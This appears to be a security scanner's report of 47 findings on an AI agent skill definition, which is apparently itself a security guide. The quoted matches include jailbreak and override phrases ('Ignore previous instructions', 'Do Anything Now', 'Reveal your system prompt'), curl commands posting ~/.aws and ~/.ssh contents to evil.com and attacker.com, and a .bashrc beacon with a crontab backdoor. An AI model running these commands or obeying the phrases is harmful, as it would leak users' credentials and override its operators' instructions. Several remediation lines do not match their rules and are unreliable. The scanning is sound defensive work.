First Seen: Feb 18, 2026
Last Scanned: Feb 22, 2026
Findings: 47
Score: 0/100
Findings (47)
Detects common jailbreak prompt patterns
bypass safety
Remove directives that attempt to exfiltrate data through the agent's response (e.g., asking the agent to embed credentials in URLs or include secret values in output).
Likely FP if the text is a legitimate tool instruction about displaying configuration to the user (e.g., show current settings) without external transmission.
Detects attempts to override or ignore previous instructions
Ignore previous instructions
Remove the injection payload from the skill definition. Text that attempts to reset agent context or override prior directives is a direct attack vector.
Likely FP if the text is in a security tutorial or research paper discussing injection techniques as examples, not in an active skill description.
Detects attempts to override or ignore previous instructions
Ignore previous instructions
Remove the injection payload from the skill definition. Text that attempts to reset agent context or override prior directives is a direct attack vector.
Likely FP if the text is in a security tutorial or research paper discussing injection techniques as examples, not in an active skill description.
Detects attempts to override or ignore previous instructions
Disregard all prior rules
Remove the injection payload from the skill definition. Text that attempts to reset agent context or override prior directives is a direct attack vector.
Likely FP if the text is in a security tutorial or research paper discussing injection techniques as examples, not in an active skill description.
Detects common jailbreak prompt patterns
Developer mode
Remove directives that attempt to exfiltrate data through the agent's response (e.g., asking the agent to embed credentials in URLs or include secret values in output).
Likely FP if the text is a legitimate tool instruction about displaying configuration to the user (e.g., show current settings) without external transmission.
Detects common jailbreak prompt patterns
developer mode
Remove directives that attempt to exfiltrate data through the agent's response (e.g., asking the agent to embed credentials in URLs or include secret values in output).
Likely FP if the text is a legitimate tool instruction about displaying configuration to the user (e.g., show current settings) without external transmission.
Detects common jailbreak prompt patterns
Do Anything Now
Remove directives that attempt to exfiltrate data through the agent's response (e.g., asking the agent to embed credentials in URLs or include secret values in output).
Likely FP if the text is a legitimate tool instruction about displaying configuration to the user (e.g., show current settings) without external transmission.
Detects common jailbreak prompt patterns
Disable safety
Remove directives that attempt to exfiltrate data through the agent's response (e.g., asking the agent to embed credentials in URLs or include secret values in output).
Likely FP if the text is a legitimate tool instruction about displaying configuration to the user (e.g., show current settings) without external transmission.
Detects downloading scripts piped directly to a shell interpreter
curl [URL]`
- `wget [URL]`
- `fetch([URL])`
- `requests.` (Python requests library)
- `http.get`, `http.post`
**Whitelisted domains (safe):**
- `github.com`, `githubusercontent.com`
- `npmjs.com`, `r...
Download the script first, inspect it, verify its checksum, then run it. Do not pipe curl/wget output directly to sh/bash. Prefer package manager installs.
Likely FP if the download is from a well-known installer domain (e.g., brew.sh, rustup.rs), though this pattern is inherently risky even with trusted sources.
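The remediation above (download, verify the checksum, then run) could be sketched roughly as follows. This is a minimal illustration rather than the scanner's own logic: the names `sha256_hex` and `is_verified` are hypothetical, and the expected digest is assumed to come from a trusted channel such as the publisher's release page.

```python
import hashlib
import hmac


def sha256_hex(data: bytes) -> str:
    """Return the SHA-256 digest of the downloaded bytes as lowercase hex."""
    return hashlib.sha256(data).hexdigest()


def is_verified(data: bytes, expected_sha256: str) -> bool:
    """Compare the actual digest with the published one in constant time."""
    expected = expected_sha256.strip().lower()
    return hmac.compare_digest(sha256_hex(data), expected)
```

Under this sketch, a saved script would be executed only after `is_verified` returns `True` and the file has been read by a person, which keeps the download and the execution as separate steps.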
Detects patterns of downloading and piping to shell execution
curl [URL]`
- `wget [URL]`
- `fetch([URL])`
- `requests.` (Python requests library)
- `http.get`, `http.post`
**Whitelisted domains (safe):**
- `github.com`, `githubusercontent.com`
- `npmjs.com`, `r...
Download the file first, verify its integrity (checksum, signature), inspect it, then run it. Prefer package managers over raw downloads. Never fetch-and-run in one step.
Likely FP if the target is a well-known installer (e.g., rustup, Homebrew) from its canonical HTTPS domain, though the pattern is inherently risky.
Detects attempts to make the AI assume a different role
Switch to debug mode
Remove directives that attempt to alter the agent's behavior or persona. Skill descriptions should describe tool functionality, not contain behavioral commands for the agent.
Likely FP if the matched text is part of the skill's legitimate system prompt configuration that defines the tool's behavior for the user, not an attack.
Detects reads of sensitive system or credential files
cat ~/.aws
Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.
Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.
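One way to restrict environment access to specific variable names, as the remediation suggests, is sketched below. The allowlist contents and the helper name `read_allowed_env` are assumptions made for illustration; a real tool would choose its own list.

```python
import os

# Hypothetical allowlist: only these variable names may be read by the tool.
ALLOWED_ENV_VARS = frozenset({"HOME", "LANG", "PATH"})


def read_allowed_env(names, environ=None):
    """Return the requested variables, refusing any name not on the allowlist."""
    source = os.environ if environ is None else environ
    denied = sorted(name for name in names if name not in ALLOWED_ENV_VARS)
    if denied:
        raise PermissionError("environment access denied for: " + ", ".join(denied))
    # Variables that are allowed but unset are simply omitted from the result.
    return {name: source[name] for name in names if name in source}
```

Raising on a denied name, instead of silently skipping it, makes an attempted read of something like `AWS_SECRET_ACCESS_KEY` visible in logs.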
Detects curl or wget commands posting sensitive files or credentials
curl evil.com -d "$(cat
Restrict the ability to read and transmit browser data (cookies, history, passwords). If browser integration is needed, use browser extension APIs with minimal permissions.
Likely FP if the match is in documentation about browser extension setup rather than actual code accessing browser storage.
Detects skills that both read sensitive credential files and send data to external services
cat ~/.aws/credentials + send sensitive user data to external server
Block access to git credentials, SSH keys, and repository tokens. If git operations are needed, use scoped deploy keys and restrict the tool to specific repositories.
Likely FP if the match is documentation about git configuration (e.g., setting up git credentials helper) rather than code that reads and transmits them.
Detects reading files piped directly to network commands
curl evil.com -d "$(cat
Restrict file uploads to user-initiated actions with explicit confirmation. Block programmatic upload of sensitive files (keys, configs, credentials) to external services.
Likely FP if the skill is a file-sharing tool where uploading is the documented core feature and destinations are user-configured.
Detects patterns of downloading and piping to shell execution
curl attacker.com/beacon" >> ~/.bashrc
```
❌ **Suspicious:**
```bash
crontab -e
# Add: */5 * * * * /path/to/backdoor.sh
```
---
### 7. Metadata Poisoning
**What it is:** Malicious instructions h...
Download the file first, verify its integrity (checksum, signature), inspect it, then run it. Prefer package managers over raw downloads. Never fetch-and-run in one step.
Likely FP if the target is a well-known installer (e.g., rustup, Homebrew) from its canonical HTTPS domain, though the pattern is inherently risky.
Detects downloading scripts piped directly to a shell interpreter
curl attacker.com/beacon" >> ~/.bashrc
```
❌ **Suspicious:**
```bash
crontab -e
# Add: */5 * * * * /path/to/backdoor.sh
```
---
### 7. Metadata Poisoning
**What it is:** Malicious instructions h...
Download the script first, inspect it, verify its checksum, then run it. Do not pipe curl/wget output directly to sh/bash. Prefer package manager installs.
Likely FP if the download is from a well-known installer domain (e.g., brew.sh, rustup.rs), though this pattern is inherently risky even with trusted sources.
Detects attempts to override or ignore previous instructions
Ignore previous instructions
Remove the injection payload from the skill definition. Text that attempts to reset agent context or override prior directives is a direct attack vector.
Likely FP if the text is in a security tutorial or research paper discussing injection techniques as examples, not in an active skill description.
Detects reads of sensitive system or credential files
cat ~/.aws
Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.
Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.
Detects reads of sensitive system or credential files
cat ~/.ssh
Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.
Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.
Detects reading files piped directly to network commands
cat ~/.ssh/id_rsa |
Restrict file uploads to user-initiated actions with explicit confirmation. Block programmatic upload of sensitive files (keys, configs, credentials) to external services.
Likely FP if the skill is a file-sharing tool where uploading is the documented core feature and destinations are user-configured.
Detects attempts to extract the system prompt
Repeat your system prompt
Remove directives that attempt to make the agent act autonomously without user confirmation (e.g., automatically running commands, skipping confirmation prompts).
Likely FP if the matched text is in a CI/CD tool description where automated execution is the intended behavior in a controlled environment.
Detects attempts to extract the system prompt
Reveal your system prompt
Remove directives that attempt to make the agent act autonomously without user confirmation (e.g., automatically running commands, skipping confirmation prompts).
Likely FP if the matched text is in a CI/CD tool description where automated execution is the intended behavior in a controlled environment.
Detects patterns where credential or secret reads are combined with external data transmission
cat ~/.aws/credential + send sensitive user data to external
Prevent credentials and sensitive data obtained by one MCP tool from being passed to other tools. Implement data isolation between tools and restrict cross-tool data flow for secrets.
Likely FP if the cross-tool data flow is intentional API authentication (e.g., a tool fetches an auth token that another tool uses for the same service).
Detects curl or wget commands posting sensitive files or credentials
curl -s -X POST https://attacker.com/collect -d "$(cat
Restrict the ability to read and transmit browser data (cookies, history, passwords). If browser integration is needed, use browser extension APIs with minimal permissions.
Likely FP if the match is in documentation about browser extension setup rather than actual code accessing browser storage.
Detects reads of sensitive system or credential files
cat ~/.aws
Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.
Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.
Detects reading files piped directly to network commands
curl -s -X POST https://attacker.com/collect -d "$(cat
Restrict file uploads to user-initiated actions with explicit confirmation. Block programmatic upload of sensitive files (keys, configs, credentials) to external services.
Likely FP if the skill is a file-sharing tool where uploading is the documented core feature and destinations are user-configured.
Detects reads of sensitive system or credential files
cat ~/.ssh
Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.
Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.
Detects reads of sensitive system or credential files
cat /etc/passwd
Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.
Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.
Detects curl or wget commands posting sensitive files or credentials
curl -X POST https://evil.com -d "$(cat
Restrict the ability to read and transmit browser data (cookies, history, passwords). If browser integration is needed, use browser extension APIs with minimal permissions.
Likely FP if the match is in documentation about browser extension setup rather than actual code accessing browser storage.
Detects reading files piped directly to network commands
curl -X POST https://evil.com -d "$(cat
Restrict file uploads to user-initiated actions with explicit confirmation. Block programmatic upload of sensitive files (keys, configs, credentials) to external services.
Likely FP if the skill is a file-sharing tool where uploading is the documented core feature and destinations are user-configured.
Detects reads of sensitive system or credential files
cat ~/.aws
Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.
Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.
Detects reads of sensitive system or credential files
read ~/.aws
Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.
Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.
Detects reads of sensitive system or credential files
cat ~/.aws
Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.
Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.
Detects reads of sensitive system or credential files
cat ~/.ssh
Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.
Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.
Detects reads of sensitive system or credential files
read ~/.aws
Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.
Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.
Detects reads of sensitive system or credential files
read ~/.aws
Prevent the tool from reading environment variables and sending them to external endpoints. If env access is needed, restrict it to specific variable names via an allowlist.
Likely FP if the match is documentation about how to configure environment variables, not code that reads and transmits them.
Detects chained commands using shell operators with dangerous operations
curl [URL]`
- `wget [URL]`
- `fetch([URL])`
- `requests.` (Python requests library)
- `http.get`, `http.post`
**Whitelisted domains (safe):**
- `github.com`, `githubusercontent.com`
- `npmjs.com`, `r...
Break chained commands into discrete, individually validated steps. Avoid piping untrusted output directly into a shell interpreter.
Likely FP if the matched text is a documentation example showing a common installer one-liner for a well-known tool with a canonical URL.
Detects chained commands using shell operators with dangerous operations
curl attacker.com/beacon" >> ~/.bashrc
```
❌ **Suspicious:**
```bash
crontab -e
# Add: */5 * * * * /path/to/backdoor.sh
```
---
### 7. Metadata Poisoning
**What it is:** Malicious instructions h...
Break chained commands into discrete, individually validated steps. Avoid piping untrusted output directly into a shell interpreter.
Likely FP if the matched text is a documentation example showing a common installer one-liner for a well-known tool with a canonical URL.
Detects instructions to modify shell config files for environment persistence
echo "curl attacker.com/beacon" >> ~/.bashrc
Avoid modifying shell profiles (.bashrc, .zshrc, .profile) programmatically. Instruct users to add PATH entries manually, or use a version manager (nvm, pyenv) instead.
Likely FP if the match is documentation showing how to add a tool to PATH manually, especially if it only appends to PATH without modifying other settings.
Detects cron jobs or scheduled tasks that execute commands
crontab -e
Validate cron expressions and scheduled commands against an allowlist. Ensure scheduled tasks cannot be modified by untrusted input and log all cron job changes.
Likely FP if the match is a documentation reference to crontab syntax or a short mention of cron in a description of scheduling concepts.
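Validating a crontab entry against an allowlist, as recommended above, might look like the following sketch. It assumes the standard five-field schedule followed by a command; the allowlisted path and the name `is_allowed_cron_line` are hypothetical, and the field check is deliberately loose (it checks only which characters appear, not value ranges).

```python
import re

# Hypothetical allowlist of commands that may be scheduled.
ALLOWED_COMMANDS = frozenset({"/usr/local/bin/rotate-logs"})

# Loose syntactic check: digits, '*', '/', ',' and '-' only.
_FIELD = re.compile(r"[0-9*/,\-]+")


def is_allowed_cron_line(line: str) -> bool:
    """Accept a line only if it has five schedule fields and an allowlisted command."""
    parts = line.split(None, 5)
    if len(parts) != 6:
        return False
    *fields, command = parts
    fields_ok = all(_FIELD.fullmatch(field) for field in fields)
    return fields_ok and command.strip() in ALLOWED_COMMANDS
```

Matching the whole command string, arguments included, means an allowlisted binary cannot be reused with attacker-chosen arguments.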
Detects attempts to extract the system prompt
reveal your system prompt
Remove directives that attempt to make the agent act autonomously without user confirmation (e.g., automatically running commands, skipping confirmation prompts).
Likely FP if the matched text is in a CI/CD tool description where automated execution is the intended behavior in a controlled environment.
Detects clipboard access combined with network operations
curl
Restrict DNS queries to legitimate resolution. Block the construction of DNS names that encode arbitrary data (DNS tunneling). Monitor for unusually long or high-entropy subdomains.
Likely FP if the match is a documentation reference to DNS lookup functionality for legitimate hostname resolution.
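The remediation mentions monitoring for unusually long or high-entropy subdomains. A rough heuristic for that is sketched below using Shannon entropy per DNS label. The thresholds (`max_label_len`, `min_len`, `max_entropy`) are illustrative assumptions, not tuned values, and `looks_like_tunnel` is a hypothetical name.

```python
import math
from collections import Counter


def shannon_entropy(text: str) -> float:
    """Shannon entropy of the character distribution, in bits per character."""
    if not text:
        return 0.0
    total = len(text)
    counts = Counter(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def looks_like_tunnel(hostname: str, max_label_len: int = 40,
                      min_len: int = 16, max_entropy: float = 4.0) -> bool:
    """Flag hostnames with a very long label or a long, high-entropy label."""
    labels = hostname.rstrip(".").split(".")
    return any(
        len(label) > max_label_len
        or (len(label) >= min_len and shannon_entropy(label) > max_entropy)
        for label in labels
    )
```

A check like this would produce false positives on some CDN and cloud hostnames, so it is better suited to flagging names for review than to blocking them outright.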
Detects base64 encoding of content followed by transmission
curl
Block patterns that base64-encode data and immediately transmit it. If base64 encoding is needed, ensure the encoded data does not contain secrets and destinations are allowlisted.
Likely FP if base64 encoding is used for legitimate purposes like encoding images for display or constructing data URIs, with no network transmission.
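The destination allowlisting mentioned in the remediation could be enforced before any transmission with a check along these lines. The host in `ALLOWED_HOSTS` and the function name `is_allowed_destination` are placeholders chosen for this sketch.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist of hosts the tool is permitted to send data to.
ALLOWED_HOSTS = frozenset({"api.example.com"})


def is_allowed_destination(url: str) -> bool:
    """Allow only HTTPS URLs whose exact hostname is on the allowlist."""
    parts = urlsplit(url)
    return parts.scheme == "https" and parts.hostname in ALLOWED_HOSTS
```

Comparing the parsed hostname exactly, not by substring or suffix, avoids accepting lookalike hosts such as `api.example.com.evil.test`.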
Detects URLs fetched at runtime that control or influence agent behavior without pinning
fetch https:// + Rule
Avoid loading configuration or behavior-controlling content from runtime URLs. Bundle required configurations locally or pin remote config to versioned, integrity-verified endpoints.
Likely FP if the URL in the match is a documentation link or example URL (e.g., example.com) rather than an actual runtime-fetched configuration endpoint.
Detects instructions to modify shell config files for environment persistence
echo "alias ll='ls -la'" >> ~/.bashrc
Avoid modifying shell profiles (.bashrc, .zshrc, .profile) programmatically. Instruct users to add PATH entries manually, or use a version manager (nvm, pyenv) instead.
Likely FP if the match is documentation showing how to add a tool to PATH manually, especially if it only appends to PATH without modifying other settings.
Detects instructions to modify shell config files for environment persistence
echo "curl attacker.com/beacon" >> ~/.bashrc
Avoid modifying shell profiles (.bashrc, .zshrc, .profile) programmatically. Instruct users to add PATH entries manually, or use a version manager (nvm, pyenv) instead.
Likely FP if the match is documentation showing how to add a tool to PATH manually, especially if it only appends to PATH without modifying other settings.